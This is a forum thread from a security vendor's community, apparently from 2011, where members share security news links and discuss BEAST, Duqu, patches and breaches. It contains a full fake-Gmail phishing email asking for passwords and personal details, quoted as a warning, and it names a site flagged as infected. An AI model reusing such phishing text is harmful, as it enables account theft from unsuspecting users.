http://www.crn.com/news/security/231601362/microsoft-fixes-office-excel-flaws-in-non-critical-patch-tuesday-release.htm?cid=nl_sec
***
-
Report: Japanese defence contractor hacked
http://www.h-online.com/security/news/item/Report-Japanese-defence-contractor-hacked-1345461.html
http://www.reuters.com/article/2011/09/19/mitsubishiheavy-computer-idUSL3E7KJ0BD20110919
-
Hackers break SSL encryption used by millions of sites
http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
-
Hackers break SSL encryption used by millions of sites
http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
:o Thanks for that info logos..!
-
Hackers break SSL encryption used by millions of sites
http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
:o Thanks for that info logos..!
yeah this could be the worse security related disaster ever.
-
Serious yes, but I want to know if this POC would work on a site not hacked.
The stealthy piece of JavaScript works with a network sniffer to decrypt encrypted cookies a targeted website uses to grant access to restricted user accounts.
So there has to this network sniffer, piece of 'stealthy' javascript, where does it come from. It would either have to be inserted into the site page (hacked) or an off site loading/running of a script (cross site scripting XSS, again hacked site).
Well I'm looking at what protection can be offered in the form of the web shield (good on hacked sites and inserted script tags, etc.) and things like NoScript and RequestPolicy firefox add-ons to prevent local or XSS scripts from running (unless of course you gave permission).
“BEAST is like a cryptographic Trojan horse – an attacker slips a bit of JavaScript into your browser, and the JavaScript collaborates with a network sniffer to undermine your HTTPS connection,”
So again I don't see any mention in all of this of a systems local security software and how it plays out in this.
EDIT: incorrect formatting of quote.
-
Beginning to wonder if anything is safe any more.
-
I think there is a degree of hype/fear-mongering in this when it doesn't take any account of users security measures or even mention methods of combating it.
-
just note this PoC comes from researchers who already are responsible for another POC forcing Microsoft and Oracle to do out of band patch in past ...
so i would not understimate the seriousness ...
already it's discussed it takes only 5minutes to de-cypher and most sites has 10 minutes expire so this is nasty
also i hope this forces all websites to upgrade to 2nd revision of TLS 1.2 (SSL 3.3)
-
***
Russian hacker sells home and cars to pay RBS
A Russian hacker who breached the security of RBS' WorldPay service and stole $9m (£6m) has had his property sold to compensate the bank.
Viktor Pleshchuk's two flats and two cars, a BMW and a Lada, were auctioned off in Saint Petersburg on Monday.
According to a Russian news portal RIA Novosti, the sale raised 10m roubles (£200,000).
http://www.bbc.co.uk/news/technology-14989264
***
-
Botnets on discount!
Creating a botnet has become insanely easy and cheap
http://blog.gdatasoftware.com/blog/article/botnets-on-discount.html
-
***
New malicious email attachments come with accusations, threats
The latest social engineering trick to get victims to open malicious email attachments accuses them of being spammers and threatens to sue them if they don't stop. It's all in an attempt to get targets to open up the zip attachment by telling them it contains evidence of their spamming. Actually it's an .exe file that infects the machine but displays like a document.
The emails are dressed up to look like they come from real businesses that are upset because the recipient has been spamming them. "The emails even formally claims that legal action will be taken because of the spam you have sent," says the blog.
http://www.networkworld.com/news/2011/092111-malware-251104.html
***
-
Aftermath - VASCO Announces Bankruptcy Filing by DigiNotar B.V.
http://www.vasco.com/company/press_room/news_archive/2011/news_vasco_announces_bankruptcy_filing_by_diginotar_bv.aspx
-
I'm pretty sure nobody here would fall for it but I got an email purporting to be from Google about upgrading my gmail. The message was the following:
Dear Gmail Account User,
A DGTFX virus has been detected in your folders
Your email account has to be upgraded to our new
Secured DGTFX anti-virus 2011 version to prevent
damages to our email log and your important
files.
Click your reply tab, Fill the columns below and
send back or your email account will be terminated
immediately to avoid spread of the virus.
USER ID:
PASSWORD:
PHONE NUMBER:
DATE OF BIRTH:
Gmail Technical Team
Note that your password will be encrypted with
1024-bit RSA keys for your password safety to
avoid any unauthorized user.
It said it was from upgrade @gmail.com but a thorough inspection of the header revealed that it actually came from somebody in Romania since it had a .ro at the end of the address.
-
Mac trojan posing as a PDF file
http://www.f-secure.com/weblog/archives/00002241.html
-
Mac trojan posing as a PDF file
http://www.f-secure.com/weblog/archives/00002241.html
Also A new trojan has been released targeting the Macintosh Chinese-language user community. The trojan appears to the user to be a PDF containing a Chinese language article on the long-running dispute over whether Japan or China owns the Diaoyu Islands.
http://blog.eset.com/2011/09/23/pdf-trojan-appears-on-mac-os-x
-
Hackers break SSL encryption used by millions of sites
http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
First solutions for SSL/TLS vulnerability
http://www.h-online.com/security/news/item/First-solutions-for-SSL-TLS-vulnerability-1349813.html
-
Hi Asyn,
There is a FixIT - http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx (link from social.s-msft.com - link source author: swiat)
polonus
-
Hi Asyn,
There is a FixIT - http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx (link from social.s-msft.com - link source author: swiat)
polonus
Yes but sadly only for W7.
Chrome and Firefox use the Network Security Services (NSS), which only support TLS 1.0. Windows Vista, XP, 2000 and Server 2003 as well as Server 2008 are also incapable of using TLS 1.1 by default.
-
Mysql.com hacked, infecting visitors with malware
http://blog.armorize.com/2011/09/mysqlcom-hacked-infecting-visitors-with.html
https://krebsonsecurity.com/2011/09/mysql-com-sold-for-3k-serves-malware/
-
Hi Asyn,
There is a FixIT - http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx (link from social.s-msft.com - link source author: swiat)
polonus
i checked the manual edit, i must say it dont work because i can't do it myself due to 'line max character limit)
if i just copy the actual line and change the order, i'm missing approx 50 characters over 1024
jeez who in these days have character limit ...
-
Mac trojan posing as a PDF file
http://www.f-secure.com/weblog/archives/00002241.html
Apple Updates Anti-Malware Tools to Address New Trojan Threat
http://www.macrumors.com/2011/09/26/apple-updates-anti-malware-tools-to-address-new-trojan-threat/
-
"Firefox devs mull dumping Java to stop BEAST attacks"
http://www.theregister.co.uk/2011/09/29/firefox_killing_java/
-
Mozilla discussion here (about Java)
https://bugzilla.mozilla.org/show_bug.cgi?id=689661
I recommend that we blocklist all versions of the Java Plugin.
As far as I understand the situation, If all of these apply:
(1) The attacker can control the user's network connection, and
(2) The attacker can perform DNS rebinding or similar
(3) The user loads any non-HTTPS page, or the user loads an HTTPS page controlled by the attacker
(4) The Java plugin is enabled
then, the attacker will be able to steal the user's *existing* session cookies for any website, including any *HTTPS* website that the user visits, even when the cookies are marked Secure and HttpOnly. So, for example, the attacker would be able to steal the uesr's Google mail cookie, Paypal cookie, bugzilla.mozilla.org cookie, mail.mozilla.com cookie, etc., allowing the attacker to log in as the user.
My understanding is that Oracle may or may not be aware of the details of the same-origin exploit. As of now, we have no ETA for a fix for the Java plugin.
-
Seems lunacy, for firefox to drop JAVA (when many may not have it anyway) when essentially the vulnerability is in the SSL/TLS version used by the browser for secure communication. The vulnerable versions being SSL V3.0 and TLS 1.0. Surely they should be working towards firefox using TLS 1.1 and 1.2 of TLS that aren't susceptible.
I also thought it was a specially crafted javascript and not JAVA that did the decryption, which is immaterial if version 1.1 and 1.2 of TLS aren't susceptible, gear firefox up to use those versions.
-
For their chosen-plaintext attack on the Cipher-Block Chaining (CBC) mode that tends to be used with TLS, Rizzo and Duong have to bypass the browser's Same Origin Policy (SOP) so that they can communicate with servers outside of, for instance, the Java applet's domain.
Although the purpose of SOPs is to prevent exactly that, a previously undisclosed bug in Java appears to enable attackers to do so regardless. In the Firefox developers' opinion, the onus is therefore on Oracle to solve the Java problem first. However, Oracle has so far failed to respond, which has prompted the developers to consider releasing an update that disables all Java plug-ins for security reasons.
http://www.h-online.com/security/news/item/Mozilla-considers-disabling-Java-in-Firefox-1351590.html
-
Seems lunacy, for firefox to drop JAVA (when many may not have it anyway) when essentially the vulnerability is in the SSL/TLS version used by the browser for secure communication. The vulnerable versions being SSL V3.0 and TLS 1.0. Surely they should be working towards firefox using TLS 1.1 and 1.2 of TLS that aren't susceptible.
I also thought it was a specially crafted javascript and not JAVA that did the decryption, which is immaterial if version 1.1 and 1.2 of TLS aren't susceptible, gear firefox up to use those versions.
David, I already disabled TLS 1.0 in the past once in Firefox >>> end result? ... most secure sites don't use TLS 1.1 and later, you get an error message and the sites won't open.
-
Yes sites have to play their part too and update vulnerable SSL/TLS versions. Problem being the chicken and the egg, if browsers don't give the option/work with the later TLS versions, then sites won't bother either.
Disabling TLS 1.0 in firefox is a bit of a waste of time right now, as it would then fall back to SSL 3.0 which is also vulnerable. FF7 and below only have SSL3 and TLS 1.0 as the encryption protocol options.
-
nope not here ;D that's why I tried it a while ago, as I'm using FIPS settings as a basis in FF. SSL3 is disabled (not just from the advanced settings it's not enough). So when I disabled TLS 1.0, I made the mistake to believe that 1.1 and later were present in FF, well they're not. But they're available in Windows for IE (TLS 1.1 and later). That's were you can actually experiment and see that no site supports that, see screen shot with default settings.
-
Which is why I'm saying Mozilla needs to concentrate some effort in firefox having TLS 1.1 and 1.2 as options. Then at least when sites start to catch up their users have it as an option.
So it could at least be a selection preference TLS 1.2, drop to 1.1 and then to 1.0 if the site doesn't have the higher level TLS support. Then if the user so chooses they can uncheck TLS 1.0 so they at least know that the site has a security weakness and choose if they want to enable 1.0 for that instance.
The problem is when they have no option at all when both versions in firefox are vulnerable.
However, all that said, I think that this really has had more headline grabbing attention when this isn't going to be a very common occurrence. Plus no mention of what the users own security applications can do to block the specially crafter script to do the decryption. Not to mention the time it takes.
-
the simple solution is use RS4 istead CBS, the problem here is ... i can't switch it manually in the policy editor because some idiot on Microsoft decided 1024 characters is maximum for that line
yet the DEFAULT value uses 1080 characters lol
-
Chrome: Problems with Microsoft Security Essentials
http://chrome.blogspot.com/2011/09/problems-with-microsoft-security.html
Edit: Chrome updates to repair Microsoft false alarm damage
http://www.h-online.com/security/news/item/Chrome-updates-to-repair-Microsoft-false-alarm-damage-1353162.html
-
Cisco patch day closes critical vulnerabilities
http://www.h-online.com/security/news/item/Cisco-patch-day-closes-critical-vulnerabilities-1354156.html
http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep11.html
-
Security Advisory for Adobe Photoshop Elements 8
http://www.adobe.com/support/security/advisories/apsa11-03.html
-
Firefox and SeaMonkey users warned to disable McAfee ScriptScan
http://www.h-online.com/security/news/item/Firefox-and-SeaMonkey-users-warned-to-disable-McAfee-ScriptScan-1355098.html
https://addons.mozilla.org/en-US/firefox/blocked/i42/
-
VMware hosted products address remote code execution vulnerability
http://www.vmware.com/security/advisories/VMSA-2011-0011.html
-
Scum sucking, pond life, bottom feeding scammers have jumped on this news of the death Steve Jobs.
http://uk.news.yahoo.com/facebook-scammers-prey-on-steve-jobs-death.html (http://uk.news.yahoo.com/facebook-scammers-prey-on-steve-jobs-death.html)
Facebook scammers have seized on the death of Apple co-founder and visionary Steve Jobs by posting malicious content claiming to be giving away free iPads ‘in memory of Steve’.
Not sure if you will be able to access this link or not, but I'm sure this news will be out in other media outlets. Suffice to say this may spread the the usual social engineering attacks/emails, etc. trying to trick the unwary.
-
more on the above...
Cybercriminals Remember Steve Jobs Through Facebook Scam
http://blog.trendmicro.com/cybercriminals-remember-steve-jobs-through-facebook-scam/
-
Yes it doesn't take these scum sucking, leaches long to latch on to the next big social event.
-
Cisco patch day closes critical vulnerabilities
http://www.h-online.com/security/news/item/Cisco-patch-day-closes-critical-vulnerabilities-1354156.html
http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep11.html
More patches from Cisco
http://www.h-online.com/security/news/item/More-patches-from-Cisco-1356415.html
-
Microsoft Security Bulletin Advance Notification for October 2011
http://technet.microsoft.com/en-us/security/bulletin/ms11-oct
-
Malicious images (codes)
http://www.norman.com/security_center/security_center_archive/2011/malicious_images_or_codes/en-uk
Malicious QR Codes Pushing Android Malware
http://www.securelist.com/en/blog/208193145/Its_time_for_malicious_QR_codes
-
Malicious images (codes)
http://www.norman.com/security_center/security_center_archive/2011/malicious_images_or_codes/en-uk
Malicious QR Codes Pushing Android Malware
http://www.securelist.com/en/blog/208193145/Its_time_for_malicious_QR_codes
I wish we had avast for Blackberry... I wish avast mobile detects such malwares...
But it is only a wish, further from reality. The reality is the malware in the other side of the bar code...
-
WineHQ database compromise
http://www.winehq.org/pipermail/wine-users/2011-October/097753.html
-
Fedora Project: Mandatory password and ssh key change by 2011-11-30
http://lists.fedoraproject.org/pipermail/devel-announce/2011-October/000840.html
-
Critical security hole in current version of Opera
http://www.h-online.com/security/news/item/Critical-security-hole-in-current-version-of-Opera-1362504.html
http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html
-
Oracle Critical Patch Update Pre-Release Announcement - October 2011
http://www.oracle.com/technetwork/topics/security/cpuoct2011-330135.html
Oracle Java SE Critical Patch Update Pre-Release Announcement - October 2011
http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html
-
Critical security hole in current version of Opera
http://www.h-online.com/security/news/item/Critical-security-hole-in-current-version-of-Opera-1362504.html
http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html
Opera 11.52 is available for download/upgrade today.
-
W32.Duqu: The Precursor to the Next Stuxnet
http://www.symantec.com/connect/w32_duqu_precursor_next_stuxnet
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
-
Hi Asyn,
The C-media Certificate was apparently stolen: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
And here F-Secure's Mikko states that w32_duqu was made by the same makers of the previous Stuxnet malware: http://www.f-secure.com/weblog/archives/00002255.html
polonus
-
Nasdaq hackers spied on company boards
http://www.reuters.com/article/2011/10/20/us-nasdaq-hacking-idUSTRE79J84T20111020
-
asyn,wow,you're like an information ninja,dont you ever sleep? ;D
-
Hi Asyn,
The C-media Certificate was apparently stolen: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
And here F-Secure's Mikko states that w32_duqu was made by the same makers of the previous Stuxnet malware: http://www.f-secure.com/weblog/archives/00002255.html
polonus
Great to see Polonus back :-)
-
Imperva, a pioneer and leader of a new category of data security solutions for high-value business data in the data center, announced today the release of the “The Monthly Trend Report,” the fifth in the Hacker Intelligence Initiative research series. The report analyzes the content and activities of an online hacker forum with nearly 220,000 registered members, although many are dormant.
More (http://www.imperva.com/news/press/2011/10_17_Imperva_Releases_First_Comprehensive_Hacker_Forum_Analysis.html)
Read the report here (http://docs.google.com/viewer?url=http://www.imperva.com/docs/HII_Monitoring_Hacker_Forums.pdf)(Google viewer)
-
Hi,
I am a new user and hence unsure if this message is posted in the correct section.
Avast warns of a trojan the site <www.madrasgymkhanaclub.com> with the message
"Infection: js:Downloader-BAX [Trj]"
Screenshot attached. The webmaster insists there is no trojan on the site and other programs like Norton Security allow access to the site without warning.
How do I know if there is a threat or not ? Further is there any check / link for online verification of infected URLs /sites ?
Thanks
Ranjit
-
Hi, I am a new user and hence unsure if this message is posted in the correct section.
Yes, you posted in an ongoing thread for security notices, wrong place.
Please start your own topic in this section>>http://forum.avast.com/index.php?board=4.0 (http://forum.avast.com/index.php?board=4.0)
-
I am a new user and hence unsure if this message is posted in the correct section.
Avast warns of a trojan the site <wXw.madrasgymkhanaclub.com> with the message
"Infection: js:Downloader-BAX [Trj]"
As mentioned this is in the wrong place and the site does appear to have been infected/hacked - Please 'modify' your post change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites (as I did in the quoted text), thanks.
But a quick confirmation (no further input should be in this topic but its own new topic) - Avast isn't the only thing which considers it infected http://sitecheck.sucuri.net/scanner/ and check for yourself, image extract of results below.
-
Adobe remedies webcam spy hole in Flash
http://www.h-online.com/security/news/item/Adobe-remedies-webcam-spy-hole-in-Flash-1364631.html
http://blogs.adobe.com/psirt/2011/10/clickjacking-issue-in-adobe-flash-player-settings-manager.html
http://www.feross.org/webcam-spy/
-
Mac Trojan Disables XProtect Updates
http://www.f-secure.com/weblog/archives/00002256.html
-
MyBB downloads were infected
http://www.h-online.com/open/news/item/MyBB-downloads-were-infected-1366300.html
http://blog.mybb.com/2011/10/25/some-closure-on-the-1-6-4-security-vulnerability/
-
Avira anti-virus detects itself
http://www.h-online.com/security/news/item/Avira-anti-virus-detects-itself-1367055.html
-
Avira anti-virus detects itself
i dont blame it for detecting itself,lol. :D ;D
-
Avira anti-virus detects itself
i dont blame it for detecting itself,lol. :D ;D
Yes, me neither. ;D 8)
-
Avira anti-virus detects itself
;D LOL ;D
-
Avira anti-virus detects itself
http://www.h-online.com/security/news/item/Avira-anti-virus-detects-itself-1367055.html
Ouch! ;D
-
Hi Omid Farhang,
We all have our painful moments. Nothing to see here, time to move on...
pol
-
Avira anti-virus detects itself
http://www.h-online.com/security/news/item/Avira-anti-virus-detects-itself-1367055.html
LOL ;D
-
Lenovo T520 XP-64 Business Avast.
Here's what's happening. When I try to install bluetooth, Avast complains with the error code attached and BT never installs correctly.
Can anyone help on this? mitch DOT landry AT rawsonemt DOT com
<?xml version="1.0" encoding="UTF-16"?>
<DATABASE>
<EXE NAME="avast.setup" FILTER="GRABMI_FILTER_PRIVACY">
<MATCHING_FILE NAME="setiface.dll" SIZE="192048" CHECKSUM="0x39B6DD52" MODULE_TYPE="WIN32" PE_CHECKSUM="0x39AD5" LINKER_VERSION="0x50000" LINK_DATE="09/06/2011 21:04:25" UPTO_LINK_DATE="09/06/2011 21:04:25" />
<MATCHING_FILE NAME="INF\x64\aswBoot.exe" SIZE="254400" CHECKSUM="0xC778AB61" BIN_FILE_VERSION="6.0.1289.0" BIN_PRODUCT_VERSION="6.0.1289.0" PRODUCT_VERSION="6.0.1289.0" FILE_DESCRIPTION="avast! start-up scanner" COMPANY_NAME="AVAST Software" PRODUCT_NAME="avast! Antivirus " FILE_VERSION="6.0.1289.0" ORIGINAL_FILENAME="aswBoot.exe" INTERNAL_NAME="aswBoot" LEGAL_COPYRIGHT="Copyright (c) 2011 AVAST Software" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x0" MODULE_TYPE="WIN32" PE_CHECKSUM="0x0" LINKER_VERSION="0x50000" UPTO_BIN_FILE_VERSION="6.0.1289.0" UPTO_BIN_PRODUCT_VERSION="6.0.1289.0" LINK_DATE="09/06/2011 20:44:25" UPTO_LINK_DATE="09/06/2011 20:44:25" VER_LANGUAGE="Czech [0x405]" />
<MATCHING_FILE NAME="INF\x64\netcfg_x64.exe" SIZE="76336" CHECKSUM="0xB89E2E93" MODULE_TYPE="WIN32" PE_CHECKSUM="0x1F0AC" LINKER_VERSION="0x0" LINK_DATE="02/17/2010 17:38:19" UPTO_LINK_DATE="02/17/2010 17:38:19" />
</EXE>
<EXE NAME="kernel32.dll" FILTER="GRABMI_FILTER_THISFILEONLY">
<MATCHING_FILE NAME="kernel32.dll" SIZE="1504256" CHECKSUM="0x5CD29B99" BIN_FILE_VERSION="5.2.3790.4480" BIN_PRODUCT_VERSION="5.2.3790.4480" PRODUCT_VERSION="5.2.3790.4480" FILE_DESCRIPTION="Windows NT BASE API Client DLL" COMPANY_NAME="Microsoft Corporation" PRODUCT_NAME="Microsoft® Windows® Operating System" FILE_VERSION="5.2.3790.4480 (srv03_sp2_gdr.090321-1244)" ORIGINAL_FILENAME="kernel32" INTERNAL_NAME="kernel32" LEGAL_COPYRIGHT="© Microsoft Corporation. All rights reserved." VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x40004" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x1773D3" LINKER_VERSION="0x50002" UPTO_BIN_FILE_VERSION="5.2.3790.4480" UPTO_BIN_PRODUCT_VERSION="5.2.3790.4480" LINK_DATE="03/21/2009 16:59:09" UPTO_LINK_DATE="03/21/2009 16:59:09" VER_LANGUAGE="English (United States) [0x409]" />
</EXE>
</DATABASE>
-
@Skiggly
when/if you need help start you own topic wher you explain your problem..
do not post inside another topic....especially one that has nothing to do with your problem
-
No surprise...
Gadhafi-themed targeted malware
http://blogs.norman.com/2011/malware-detection-team/gadhafi-themed-targeted-malware
VirusTotal scan - okt.21
http://www.virustotal.com/file-scan/report.html?id=2978c6cfff1754c85a4a22b6a72dc9e60b596b54e65ed5ab2c80b8bc259ca5dc-1319203716
Screaming Headlines Shout Malware Danger
http://blogs.norman.com/2011/for-consumption/screaming-headlines-shout-malware-danger
-
Denial of Service attacks against secure web sites
http://www.norman.com/security_center/security_center_archive/2011/dos_attacks_against_secure_web_sites/en-us
-
Worm wriggles through year-old flaw, builds zombie-net. More a business failure than a software security failure'
http://www.theregister.co.uk/2011/10/26/jboss_worm/
Tsunami Trojan: First Mac attack based on Linux crack. Slips in Mac OS X backdoor, phones home
http://www.theregister.co.uk/2011/10/26/tsunami_mac_backdoor/
-
Facebook sees 600,000 compromised logins per day
http://arstechnica.com/gadgets/news/2011/10/facebook-sees-600000-compromised-logins-per-day006-of-all-logins.ars
-
Duqu exploits previously unknown vulnerability in Windows kernel
http://www.h-online.com/security/news/item/Duqu-exploits-previously-unknown-vulnerability-in-Windows-kernel-1370369.html
-
Facebook sees 600,000 compromised logins per day
http://arstechnica.com/gadgets/news/2011/10/facebook-sees-600000-compromised-logins-per-day006-of-all-logins.ars
I still wonder if "compromised" means actual hacked accounts or simply attempts to access an account using
an incorrect password ??? (Something all of us have probably done on occasion.)
-
Duqu exploits previously unknown vulnerability in Windows kernel
http://www.h-online.com/security/news/item/Duqu-exploits-previously-unknown-vulnerability-in-Windows-kernel-1370369.html
Microsoft releases Security Advisory 2639658
http://blogs.technet.com/b/msrc/archive/2011/11/03/microsoft-releases-security-advisory-2639658.aspx
https://technet.microsoft.com/en-us/security/advisory/2639658
-
Duqu exploits previously unknown vulnerability in Windows kernel
http://www.h-online.com/security/news/item/Duqu-exploits-previously-unknown-vulnerability-in-Windows-kernel-1370369.html
Microsoft releases Security Advisory 2639658
http://blogs.technet.com/b/msrc/archive/2011/11/03/microsoft-releases-security-advisory-2639658.aspx
https://technet.microsoft.com/en-us/security/advisory/2639658
So the fix involves something that might break other things. I'll wait for the actual patch and depend on Avast in the meantime.
-
Whilst I too will wait for the actual security update, when you download the hotfix/fixit there is normally an associated one to reverse the fix. If I were to use the fixit I would download the reversal function also.
-
Microsoft is currently still working on a security update. However, the company said that the update will not be ready in time for its upcoming monthly patch day, known as Patch Tuesday, next week.
As Dave said, you can Enable/Disable the fix: http://support.microsoft.com/kb/2639658
-
Revoking Trust in DigiCert Sdn. Bhd Intermediate Certificate Authority
https://blog.mozilla.com/security/2011/11/03/revoking-trust-in-digicert-sdn-bhd-intermediate-certificate-authority/
http://blogs.technet.com/b/msrc/archive/2011/11/03/untrusted-certificate-store-to-be-updated.aspx
http://www.entrust.net/advisories/malaysia.htm
-
Microsoft Security Bulletin Advance Notification for November 2011
http://technet.microsoft.com/en-us/security/bulletin/ms11-nov
-
Major DNS Cache Poisoning Attack Hits Brazilian ISPs
here is a large-scale DNS cache-poisoning attack going on in Brazil at the moment, with potentially millions of users affected by a tactic that is forcing the to install a malicious Java applet before they can reach many popular sites, including Google, Gmail and Hotmail.
More (http://threatpost.com/en_us/blogs/major-dns-cache-poisoning-attack-hits-brazilian-isps-110711)
-
Duqu exploits previously unknown vulnerability in Windows kernel
http://www.h-online.com/security/news/item/Duqu-exploits-previously-unknown-vulnerability-in-Windows-kernel-1370369.html
Microsoft releases Security Advisory 2639658
http://blogs.technet.com/b/msrc/archive/2011/11/03/microsoft-releases-security-advisory-2639658.aspx
https://technet.microsoft.com/en-us/security/advisory/2639658
Nice..!!! :)
http://www.avast.com/zero-day-exploit-reports
-
Security update available for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb11-27.html
-
Security update available for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb11-27.html
Thanks, I didn't even know I had it installed. It must have come with the computer. I just updated it but I'm not sure I even need it.
-
Security update available for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb11-27.html
Thanks, I didn't even know I had it installed. It must have come with the computer. I just updated it but I'm not sure I even need it.
NP. And if you don't need it, just drop it. ;)
-
Are Adobe Shockwave Player and Adobe Flash Player now rolled into one application/plug-in called Adobe Shockwave Player ?
-
Are Adobe Shockwave Player and Adobe Flash Player now rolled into one application/plug-in called Adobe Shockwave Player ?
AFAIK, Flash Player and Shockwave Player are still 2 different things. I certainly have them both as separated tools, with different versions. Both are from Adobe.
-
Yes thought so, but the plugin for adobe flash player in firefox is reported as Shockwave Flash (and I though I had avoided adobe shockwave player.
-
At Adobe homepage, see attachment.
-
Adobe Flash and Adobe AIR security vulnerability fixed, new versions released
http://www.adobe.com/support/security/bulletins/apsb11-28.html
details and download: http://forum.avast.com/index.php?topic=9671.msg706346#msg706346
-
FBI busts global internet fraud ring.
http://www.dailytelegraph.com.au/technology/fbi-busts-internet-fraud-ring-affecting-tens-of-thousands-of-australian-computers/story-fn7bsi21-1226192935830
-
Steam compromised by hackers
http://www.h-online.com/security/news/item/Steam-compromised-by-hackers-1377240.html
-
Malware Signed With a Governmental Signing Key
http://www.f-secure.com/weblog/archives/00002269.html
-
Steam compromised by hackers
http://www.h-online.com/security/news/item/Steam-compromised-by-hackers-1377240.html
Thanks for the warning as I used Steam for all my Call of Duty Modern Warfare games ;)
-
Steam compromised by hackers
http://www.h-online.com/security/news/item/Steam-compromised-by-hackers-1377240.html
Thanks for the warning as I used Steam for all my Call of Duty Modern Warfare games ;)
NP pal. :)
-
Apple OS X Sandbox Predefined Profiles Bypass
http://www.coresecurity.com/content/apple-osx-sandbox-bypass
-
Steam compromised by hackers
http://www.h-online.com/security/news/item/Steam-compromised-by-hackers-1377240.html
It was really only the forums that were affected and that has been resolved.
-
not true, both STEAM forum and STEAM user database were leaked,
it's unknown what type of encryption was used for STEAM account passwords
only that the part with CreditCards info was by AES256
-
not true, both STEAM forum and STEAM user database were leaked,
it's unknown what type of encryption was used for STEAM account passwords
only that the part with CreditCards info was by AES256
That's what they thought at first but there is no evidence of any compromise or illegal usage of customer data. The only impact was on the forums which had to taken down temporarily. It's nothing like the fiasco with Sony. They may have gotten in but anything they got seems to have been unusable to them.
-
New facebook virus,here we go again :
http://www.zdnet.com/blog/facebook/facebook-confirms-images-of-porn-and-violence-is-investigating/5330?tag=content;siu-container
Facebook says it is aware of users reporting a huge flood of unwanted content. This includes links, videos, and images depicting pornography, acts of violence, self-mutilation, and bestiality.
-
Unknown network event causing BIND 9 DNS server crashes
http://www.h-online.com/open/news/item/Unknown-network-event-causing-BIND-9-DNS-server-crashes-1380518.html
https://www.isc.org/software/bind/advisories/cve-2011-4313
-
XSS vulnerability in the translate helper method in Ruby on Rails
http://groups.google.com/group/rubyonrails-security/browse_thread/thread/2b61d70fb73c7cc5
-
Spam Gets a Touch of Facebook Camouflage
http://blogs.norman.com/2011/for-consumption/spam-gets-a-touch-of-facebook-camouflage
Recycling – Not Always A Good Idea
http://blogs.norman.com/2011/for-consumption/recycling-not-always-a-good-idea
Invisible YNK, a Code Signing Conundrum
http://blogs.norman.com/2011/malware-detection-team/invisible-ynk-a-code-signing-conundrum
Back to the trojans. The one above is signed in June, and it’s now November, so this trojan has lived an undisturbed and validated life for about 4.5 months.
-
H(ackers)2O: Attack on City Water Station Destroys Pump
http://www.wired.com/threatlevel/2011/11/hackers-destroy-water-pump/all/1
-
German spyware exploits iTunes vulnerability
http://www.h-online.com/security/news/item/German-spyware-exploits-iTunes-vulnerability-1382455.html
-
H(ackers)2O: Attack on City Water Station Destroys Pump
http://www.wired.com/threatlevel/2011/11/hackers-destroy-water-pump/all/1
Alleged water utility hack causes confusion
http://www.h-online.com/security/news/item/Alleged-water-utility-hack-causes-confusion-1383976.html
-
German spyware exploits iTunes vulnerability
http://www.h-online.com/security/news/item/German-spyware-exploits-iTunes-vulnerability-1382455.html
Apple Took 3+ Years to Fix FinFisher Trojan Hole
http://krebsonsecurity.com/2011/11/apple-took-3-years-to-fix-finfisher-trojan-hole/
-
FakeAV/FakePoliceAlert: Source code for sale
http://xylibox.blogspot.com/2011/11/fakeavfakepolicealert-source-code-for.html
-
Google account are now more secure with two step verification.
http://lifehacker.com/5756977/set-up-googles-two+step-verification-now-for-seriously-enhanced-security-for-your-google-account
-
Google account are now more secure with two step verification.
http://lifehacker.com/5756977/set-up-googles-two+step-verification-now-for-seriously-enhanced-security-for-your-google-account
That's seriously old news as that was published By Adam Pash, Feb 10, 2011 8:30 AM
-
Sorry people this two way verification notification just come up in my gmail, looking for more info i stumbled upon that article after reading it looked cool but i totally missed the date. Sorry again for that old post :-[. Next time i will be carefull :)
-
Facebook 'Deceived' Users, FTC Finds (http://www.pcmag.com/article2/0,2817,2396992,00.asp)
-
Interesting read, Bob, thanks -- I think we'll agree we've seen it coming for a long, long time. Too bad charges can't be laid for actions prior to this new agreement.
-
Millions of printers open to devastating hack attack
http://redtape.msnbc.msn.com/_news/2011/11/29/9076395-exclusive-millions-of-printers-open-to-devastating-hack-attack-researchers-say
http://www.hp.com/hpinfo/newsroom/press/2011/111129b.html
-
Facebook 'Deceived' Users, FTC Finds (http://www.pcmag.com/article2/0,2817,2396992,00.asp)
Facebook settles FTC privacy complaint, agrees to ask users’ permission for changes
http://www.washingtonpost.com/business/technology/facebook-settles-ftc-privacy-complaint-agrees-to-ask-users-permission-for-changes/2011/11/29/gIQAqyJC9N_story.html?wpisrc=nl_tech
-
Security Advisory for Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-04.html
-
Microsoft Security Bulletin Advance Notification for December 2011
http://technet.microsoft.com/en-us/security/bulletin/ms11-dec
-
Security Advisory for Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-04.html
Security updates available for Adobe Reader and Acrobat 9.x for Windows
http://www.adobe.com/support/security/bulletins/apsb11-30.html
-
